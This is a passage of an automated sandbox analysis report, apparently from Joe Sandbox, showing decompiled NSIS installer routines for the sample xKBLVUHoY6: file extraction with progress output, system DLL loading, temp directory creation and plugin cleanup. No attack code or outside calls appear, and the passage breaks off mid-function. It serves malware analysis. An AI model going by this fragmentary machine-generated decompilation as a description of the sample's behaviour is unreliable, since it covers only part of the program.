                                                  • Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000), ref: 00406743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll
                                                • API String ID: 1495540970-1102746303
                                                • Opcode ID: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
                                                • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                • Opcode Fuzzy Hash: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
                                                • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 643 4032b4-4032cb 644 4032d4-4032dc 643->644 645 4032cd 643->645 646 4032e3-4032e8 644->646 647 4032de 644->647 645->644 648 4032f8-403305 call 403499 646->648 649 4032ea-4032f3 call 4034af 646->649 647->646 653 403450 648->653 654 40330b-40330f 648->654 649->648 657 403452-403453 653->657 655 403315-403335 GetTickCount call 406a2f 654->655 656 403439-40343b 654->656 667 40348f 655->667 669 40333b-403343 655->669 658 403484-403488 656->658 659 40343d-403440 656->659 661 403492-403496 657->661 662 403455-40345b 658->662 663 40348a 658->663 664 403442 659->664 665 403445-40344e call 403499 659->665 670 403460-40346e call 403499 662->670 671 40345d 662->671 663->667 664->665 665->653 676 40348c 665->676 667->661 673 403345 669->673 674 403348-403356 call 403499 669->674 670->653 680 403470-403475 call 4060a9 670->680 671->670 673->674 674->653 681 40335c-403365 674->681 676->667 684 40347a-40347c 680->684 683 40336b-403388 call 406a4f 681->683 689 403431-403433 683->689 690 40338e-4033a5 GetTickCount 683->690 686 403435-403437 684->686 687 40347e-403481 684->687 686->657 687->658 689->657 691 4033f0-4033f2 690->691 692 4033a7-4033af 690->692 693 4033f4-4033f8 691->693 694 403425-403429 691->694 695 4033b1-4033b5 692->695 696 4033b7-4033ed MulDiv wsprintfW call 405569 692->696 698 4033fa-4033ff call 4060a9 693->698 699 40340d-403413 693->699 694->669 700 40342f 694->700 695->691 695->696 696->691 704 403404-403406 698->704 703 403419-40341d 699->703 700->667 703->683 705 403423 703->705 704->686 706 403408-40340b 704->706 705->667 706->703
                                                C-Code - Quality: 94%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				long _v16;
                                                				intOrPtr _v20;
                                                				short _v148;
                                                				void* _t59;
                                                				void* _t61;
                                                				intOrPtr _t69;
                                                				long _t70;
                                                				void* _t71;
                                                				intOrPtr _t81;
                                                				intOrPtr _t86;
                                                				long _t89;
                                                				signed int _t90;
                                                				int _t91;
                                                				int _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                
                                                				_t90 = _a16;
                                                				_t86 = _a12;
                                                				_v12 = _t90;
                                                				if(_t86 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_t81 = _t86;
                                                				if(_t86 == 0) {
                                                					_t81 = 0x418ec0;
                                                				}
                                                				_t56 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034AF( *0x42a278 + _t56);
                                                				}
                                                				if(E00403499( &_a16, 4) == 0) {
                                                					L33:
                                                					_push(0xfffffffd);
                                                					goto L34;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t86 == 0) {
                                                							while(_a16 > 0) {
                                                								_t91 = _v12;
                                                								if(_a16 < _t91) {
                                                									_t91 = _a16;
                                                								}
                                                								if(E00403499(0x414ec0, _t91) == 0) {
                                                									goto L33;
                                                								} else {
                                                									_t61 = E004060A9(_a8, 0x414ec0, _t91); // executed
                                                									if(_t61 == 0) {
                                                										L28:
                                                										_push(0xfffffffe);
                                                										L34:
                                                										_pop(_t59);
                                                										return _t59;
                                                									}
                                                									_v8 = _v8 + _t91;
                                                									_a16 = _a16 - _t91;
                                                									continue;
                                                								}
                                                							}
                                                							L43:
                                                							return _v8;
                                                						}
                                                						if(_a16 < _t90) {
                                                							_t90 = _a16;
                                                						}
                                                						if(E00403499(_t86, _t90) != 0) {
                                                							_v8 = _t90;
                                                							goto L43;
                                                						} else {
                                                							goto L33;
                                                						}
                                                					}
                                                					_v16 = GetTickCount();
                                                					E00406A2F(0x40ce30);
                                                					_t13 =  &_a16;
                                                					 *_t13 = _a16 & 0x7fffffff;
                                                					_a4 = _a16;
                                                					if( *_t13 <= 0) {
                                                						goto L43;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t92 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t92 = _a16;
                                                						}
                                                						if(E00403499(0x414ec0, _t92) == 0) {
                                                							goto L33;
                                                						}
                                                						_a16 = _a16 - _t92;
                                                						 *0x40ce48 = 0x414ec0;
                                                						 *0x40ce4c = _t92;
                                                						while(1) {
                                                							 *0x40ce50 = _t81;
                                                							 *0x40ce54 = _v12; // executed
                                                							_t69 = E00406A4F(0x40ce30); // executed
                                                							_v20 = _t69;
                                                							if(_t69 < 0) {
                                                								break;
                                                							}
                                                							_t93 =  *0x40ce50; // 0x418ec0
                                                							_t94 = _t93 - _t81;
                                                							_t70 = GetTickCount();
                                                							_t89 = _t70;
                                                							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t95 = _t95 + 0xc;
                                                								E00405569(0,  &_v148);
                                                								_v16 = _t89;
                                                							}
                                                							if(_t94 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L43;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_v8 = _v8 + _t94;
                                                									_v12 = _v12 - _t94;
                                                									_t81 =  *0x40ce50; // 0x418ec0
                                                									L23:
                                                									if(_v20 != 1) {
                                                										continue;
                                                									}
                                                									goto L43;
                                                								}
                                                								_t71 = E004060A9(_a8, _t81, _t94); // executed
                                                								if(_t71 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t94;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L34;
                                                					}
                                                					goto L33;
                                                				}
                                                			}






















                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dc
                                                0x004032de
                                                0x004032de
                                                0x004032e3
                                                0x004032e8
                                                0x004032f3
                                                0x004032f3
                                                0x00403305
                                                0x00403450
                                                0x00403450
                                                0x00000000
                                                0x0040330b
                                                0x0040330f
                                                0x0040343b
                                                0x00403484
                                                0x00403455
                                                0x0040345b
                                                0x0040345d
                                                0x0040345d
                                                0x0040346e
                                                0x00000000
                                                0x00403470
                                                0x00403475
                                                0x0040347c
                                                0x00403435
                                                0x00403435
                                                0x00403452
                                                0x00403452
                                                0x00000000
                                                0x00403452
                                                0x0040347e
                                                0x00403481
                                                0x00000000
                                                0x00403481
                                                0x0040346e
                                                0x0040348f
                                                0x00000000
                                                0x0040348f
                                                0x00403440
                                                0x00403442
                                                0x00403442
                                                0x0040344e
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040344e
                                                0x00403320
                                                0x00403323
                                                0x00403328
                                                0x00403328
                                                0x00403332
                                                0x00403335
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040333b
                                                0x0040333b
                                                0x0040333b
                                                0x00403343
                                                0x00403345
                                                0x00403345
                                                0x00403356
                                                0x00000000
                                                0x00000000
                                                0x0040335c
                                                0x0040335f
                                                0x00403365
                                                0x0040336b
                                                0x00403373
                                                0x00403379
                                                0x0040337e
                                                0x00403385
                                                0x00403388
                                                0x00000000
                                                0x00000000
                                                0x0040338e
                                                0x00403394
                                                0x00403396
                                                0x004033a3
                                                0x004033a5
                                                0x004033d6
                                                0x004033dc
                                                0x004033e8
                                                0x004033ed
                                                0x004033ed
                                                0x004033f2
                                                0x00403429
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004033f4
                                                0x004033f8
                                                0x0040340d
                                                0x00403410
                                                0x00403413
                                                0x00403419
                                                0x0040341d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403423
                                                0x004033ff
                                                0x00403406
                                                0x00000000
                                                0x00000000
                                                0x00403408
                                                0x00000000
                                                0x00403408
                                                0x004033f2
                                                0x00403431
                                                0x00000000
                                                0x00403431
                                                0x00000000
                                                0x0040333b

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$G8@
                                                • API String ID: 551687249-649311722
                                                • Opcode ID: 461fed4ca99b5d52942f23dd80306040ee863ae81dd43071bafdd45334f3c5c4
                                                • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                • Opcode Fuzzy Hash: 461fed4ca99b5d52942f23dd80306040ee863ae81dd43071bafdd45334f3c5c4
                                                • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 707 406864-406884 GetSystemDirectoryW 708 406886 707->708 709 406888-40688a 707->709 708->709 710 40689b-40689d 709->710 711 40688c-406895 709->711 712 40689e-4068d1 wsprintfW LoadLibraryExW 710->712 711->710 713 406897-406899 711->713 713->712
                                                C-Code - Quality: 100%
                                                			E00406864(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x0040687b
                                                0x00406884
                                                0x00406886
                                                0x00406886
                                                0x0040688a
                                                0x0040689d
                                                0x00406897
                                                0x00406897
                                                0x00406897
                                                0x004068b6
                                                0x004068ca
                                                0x004068d1

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                • wsprintfW.USER32 ref: 004068B6
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 714 405a38-405a83 CreateDirectoryW 715 405a85-405a87 714->715 716 405a89-405a96 GetLastError 714->716 717 405ab0-405ab2 715->717 716->717 718 405a98-405aac SetFileSecurityW 716->718 718->715 719 405aae GetLastError 718->719 719->717
                                                C-Code - Quality: 100%
                                                			E00405A38(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a43
                                                0x00405a47
                                                0x00405a4a
                                                0x00405a50
                                                0x00405a54
                                                0x00405a58
                                                0x00405a60
                                                0x00405a67
                                                0x00405a6d
                                                0x00405a74
                                                0x00405a7b
                                                0x00405a83
                                                0x00405a85
                                                0x00000000
                                                0x00405a85
                                                0x00405a8f
                                                0x00405a96
                                                0x00405aac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405aae
                                                0x00405ab2

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                • GetLastError.KERNEL32 ref: 00405A8F
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                • GetLastError.KERNEL32 ref: 00405AAE
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-3081826266
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 720 6eb81817-6eb81856 call 6eb81bff 724 6eb8185c-6eb81860 720->724 725 6eb81976-6eb81978 720->725 726 6eb81869-6eb81876 call 6eb82480 724->726 727 6eb81862-6eb81868 call 6eb8243e 724->727 732 6eb81878-6eb8187d 726->732 733 6eb818a6-6eb818ad 726->733 727->726 736 6eb81898-6eb8189b 732->736 737 6eb8187f-6eb81880 732->737 734 6eb818cd-6eb818d1 733->734 735 6eb818af-6eb818cb call 6eb82655 call 6eb81654 call 6eb81312 GlobalFree 733->735 741 6eb8191e-6eb81924 call 6eb82655 734->741 742 6eb818d3-6eb8191c call 6eb81666 call 6eb82655 734->742 758 6eb81925-6eb81929 735->758 736->733 743 6eb8189d-6eb8189e call 6eb82e23 736->743 739 6eb81888-6eb81889 call 6eb82b98 737->739 740 6eb81882-6eb81883 737->740 754 6eb8188e 739->754 746 6eb81890-6eb81896 call 6eb82810 740->746 747 6eb81885-6eb81886 740->747 741->758 742->758 751 6eb818a3 743->751 757 6eb818a5 746->757 747->733 747->739 751->757 754->751 757->733 762 6eb8192b-6eb81939 call 6eb82618 758->762 763 6eb81966-6eb8196d 758->763 770 6eb8193b-6eb8193e 762->770 771 6eb81951-6eb81958 762->771 763->725 768 6eb8196f-6eb81970 GlobalFree 763->768 768->725 770->771 772 6eb81940-6eb81948 770->772 771->763 773 6eb8195a-6eb81965 call 6eb815dd 771->773 772->771 774 6eb8194a-6eb8194b FreeLibrary 772->774 773->763 774->771
                                                C-Code - Quality: 88%
                                                			E6EB81817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x6eb8506c = _a8;
                                                				 *0x6eb85070 = _a16;
                                                				 *0x6eb85074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x6eb85048, E6EB81651);
                                                				_push(1); // executed
                                                				_t37 = E6EB81BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E6EB8243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E6EB82480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E6EB82655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E6EB81666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E6EB82655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E6EB82655();
                                                							_t37 = GlobalFree(E6EB81312(E6EB81654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E6EB82618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E6EB815DD( *0x6eb85068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E6EB82E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E6EB82B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E6EB82810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}


















                                                0x6eb81817
                                                0x6eb81817
                                                0x6eb81817
                                                0x6eb81824
                                                0x6eb8182c
                                                0x6eb81839
                                                0x6eb81847
                                                0x6eb8184a
                                                0x6eb8184c
                                                0x6eb81851
                                                0x6eb81856
                                                0x6eb81978
                                                0x6eb81978
                                                0x6eb8185c
                                                0x6eb81860
                                                0x6eb81863
                                                0x6eb81868
                                                0x6eb81869
                                                0x6eb8186a
                                                0x6eb81870
                                                0x6eb81876
                                                0x6eb818a6
                                                0x6eb818ad
                                                0x6eb818d1
                                                0x6eb8191e
                                                0x6eb8191f
                                                0x6eb818d3
                                                0x6eb818d3
                                                0x6eb818d4
                                                0x6eb818dd
                                                0x6eb818de
                                                0x6eb818e8
                                                0x6eb818eb
                                                0x6eb818f0
                                                0x6eb818f7
                                                0x6eb818f7
                                                0x6eb818fd
                                                0x6eb818fe
                                                0x6eb81904
                                                0x6eb8190a
                                                0x6eb81917
                                                0x6eb81918
                                                0x6eb8191b
                                                0x6eb818af
                                                0x6eb818af
                                                0x6eb818b0
                                                0x6eb818c5
                                                0x6eb818c5
                                                0x6eb81929
                                                0x6eb8192c
                                                0x6eb81939
                                                0x6eb81940
                                                0x6eb81948
                                                0x6eb8194b
                                                0x6eb8194b
                                                0x6eb81948
                                                0x6eb81958
                                                0x6eb81960
                                                0x6eb81965
                                                0x6eb81958
                                                0x6eb8196d
                                                0x00000000
                                                0x6eb8196f
                                                0x00000000
                                                0x6eb81970
                                                0x6eb8196d
                                                0x6eb8187a
                                                0x6eb8187d
                                                0x6eb8189b
                                                0x00000000
                                                0x00000000
                                                0x6eb8189e
                                                0x6eb818a3
                                                0x6eb818a3
                                                0x6eb818a5
                                                0x00000000
                                                0x6eb818a5
                                                0x6eb8187f
                                                0x6eb81880
                                                0x6eb81888
                                                0x6eb81889
                                                0x00000000
                                                0x6eb81889
                                                0x6eb81882
                                                0x6eb81883
                                                0x6eb81891
                                                0x00000000
                                                0x6eb81891
                                                0x6eb81886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81886

                                                APIs
                                                  • Part of subcall function 6EB81BFF: GlobalFree.KERNEL32 ref: 6EB81E74
                                                  • Part of subcall function 6EB81BFF: GlobalFree.KERNEL32 ref: 6EB81E79
                                                  • Part of subcall function 6EB81BFF: GlobalFree.KERNEL32 ref: 6EB81E7E
                                                • GlobalFree.KERNEL32 ref: 6EB818C5
                                                • FreeLibrary.KERNEL32(?), ref: 6EB8194B
                                                • GlobalFree.KERNEL32 ref: 6EB81970
                                                  • Part of subcall function 6EB8243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6EB8246F
                                                  • Part of subcall function 6EB82810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EB81896,00000000), ref: 6EB828E0
                                                  • Part of subcall function 6EB81666: wsprintfW.USER32 ref: 6EB81694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 2b94ad7d6658a1f7cd1ec9e17a9746d23dffe6798247dc6996f984c53ab637da
                                                • Instruction ID: 477af08596ecc616329467a61e75eb86b5315929cb267ef8b5c04c6f84d141ed
                                                • Opcode Fuzzy Hash: 2b94ad7d6658a1f7cd1ec9e17a9746d23dffe6798247dc6996f984c53ab637da
                                                • Instruction Fuzzy Hash: BD4191714122C29BDB519FE4D888BDB3FACEF06314F084965E9659B386DB74C089C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 777 406026-406032 778 406033-406067 GetTickCount GetTempFileNameW 777->778 779 406076-406078 778->779 780 406069-40606b 778->780 782 406070-406073 779->782 780->778 781 40606d 780->781 781->782
                                                C-Code - Quality: 100%
                                                			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
